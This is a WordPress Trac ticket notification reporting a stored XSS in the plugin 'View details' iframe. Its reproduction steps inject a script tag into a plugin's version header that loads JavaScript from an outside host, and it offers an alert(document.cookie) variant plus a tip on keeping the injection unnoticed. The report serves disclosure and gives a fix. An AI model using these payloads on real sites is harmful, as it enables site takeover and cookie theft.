[wp-trac] [WordPress Trac] #53020: Stored XSS via «View details» plugin iFrame

WordPress Trac noreply at wordpress.org
Fri May 7 13:35:34 UTC 2021


#53020: Stored XSS via «View details» plugin iFrame
--------------------------+-----------------------------
 Reporter:  m0ze          |       Owner:  (none)
     Type:  defect (bug)  |      Status:  new
 Priority:  normal        |   Milestone:  5.8
Component:  Security      |     Version:  trunk
 Severity:  normal        |  Resolution:
 Keywords:  has-patch     |     Focuses:  administration
--------------------------+-----------------------------
Description changed by SergeyBiryukov:

Old description:

> I found a way to use the XSS attack vector - through an iFrame with a
> detailed description of the plugin (plugin «View details» iFrame).
>
> === Possible operation options:
>
> * substitution or modification of the original plug-in to hide malicious
> code;
>
> * distribution of the modified plugin through third-party resources.
>

> === Steps To Reproduce:
>
> 0. open any existed plugin from the official WordPress repo, f.e. Hello
> Dolly.
> 1. change the version number to +1 (as a minimum) - from `Version: 1.7.2`
> to `Version: 1.7.3`.
> 2. add your payload right after the last digit - `Version: 1.7.3<script
> src="https://m0ze.ru/payload.a.js"></script>`
> 3. check the plugin info via dashboard, «View details» link.
>
> If you use the payload specifically as a `<script src=...></script>`,
> then visually, except for one digit in the plugin version, nothing will
> change. Other payloads also work
> (`<script>alert(document.cookie)</script>` etc.), but they add extra
> special characters on the right of the plugin version, which may alert
> the website administrator.
>

> === Screenshots:
>
> [[Image(https://i.imgur.com/7pz6UMh.png)]]
>
> [[Image(https://i.imgur.com/E7ejGkJ.png)]]
>
> [[Image(https://i.imgur.com/r2WQmFQ.png)]]
>

> === Code:
>
> **/wp-admin/includes/plugin-install.php, 881-884:**
>
> {{{#!php
> case 'newer_installed':
>         /* translators: %s: Plugin version. */
>         echo '<a class="button button-primary right disabled">' .
> sprintf( __( 'Newer Version (%s) Installed' ), $status['version'] ) .
> '</a>';
> break;
> }}}
>

> === Quick fix:
>
> `strip_tags($status['version'])`
>

> === Video:
>
> **YouTube short demo:** https://youtu.be/_IRcQ82wovY
>

> === Impact
>
> Malicious JavaScript code injections, the ability to combine attack
> vectors against the targeted system, which can lead to a complete
> compromise of the resource.
>

> There is also an unknown number of plugins that display diagnostic
> information about the site, including the names and versions of plugins,
> where this vulnerability will also be triggered, f.e.: Asset CleanUp:
> Page Speed Booster, WP Cerber Security, Anti-spam & Malware Scan and many
> other plugins.

New description:

 I found a way to use the XSS attack vector - through an iFrame with a
 detailed description of the plugin (plugin «View details» iFrame).

 === Possible operation options:

 * substitution or modification of the original plug-in to hide malicious
 code;

 * distribution of the modified plugin through third-party resources.


 === Steps To Reproduce:

 0. open any existed plugin from the official WordPress repo, f.e. Hello
 Dolly.
 1. change the version number to +1 (as a minimum) - from `Version: 1.7.2`
 to `Version: 1.7.3`.
 2. add your payload right after the last digit - `Version: 1.7.3<script
 src="https://m0ze.ru/payload.a.js"></script>`
 3. check the plugin info via dashboard, «View details» link.

 If you use the payload specifically as a `<script src=...></script>`, then
 visually, except for one digit in the plugin version, nothing will change.
 Other payloads also work (`<script>alert(document.cookie)</script>` etc.),
 but they add extra special characters on the right of the plugin version,
 which may alert the website administrator.


 === Screenshots:

 https://i.imgur.com/7pz6UMh.png

 https://i.imgur.com/E7ejGkJ.png

 https://i.imgur.com/r2WQmFQ.png


 === Code:

 **/wp-admin/includes/plugin-install.php, 881-884:**

 {{{#!php
 case 'newer_installed':
         /* translators: %s: Plugin version. */
         echo '<a class="button button-primary right disabled">' . sprintf(
 __( 'Newer Version (%s) Installed' ), $status['version'] ) . '</a>';
 break;
 }}}


 === Quick fix:

 `strip_tags($status['version'])`


 === Video:

 **YouTube short demo:** https://youtu.be/_IRcQ82wovY


 === Impact

 Malicious JavaScript code injections, the ability to combine attack
 vectors against the targeted system, which can lead to a complete
 compromise of the resource.


 There is also an unknown number of plugins that display diagnostic
 information about the site, including the names and versions of plugins,
 where this vulnerability will also be triggered, f.e.: Asset CleanUp: Page
 Speed Booster, WP Cerber Security, Anti-spam & Malware Scan and many other
 plugins.

--

-- 
Ticket URL: <https://core.trac.wordpress.org/ticket/53020#comment:6>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform


More information about the wp-trac mailing list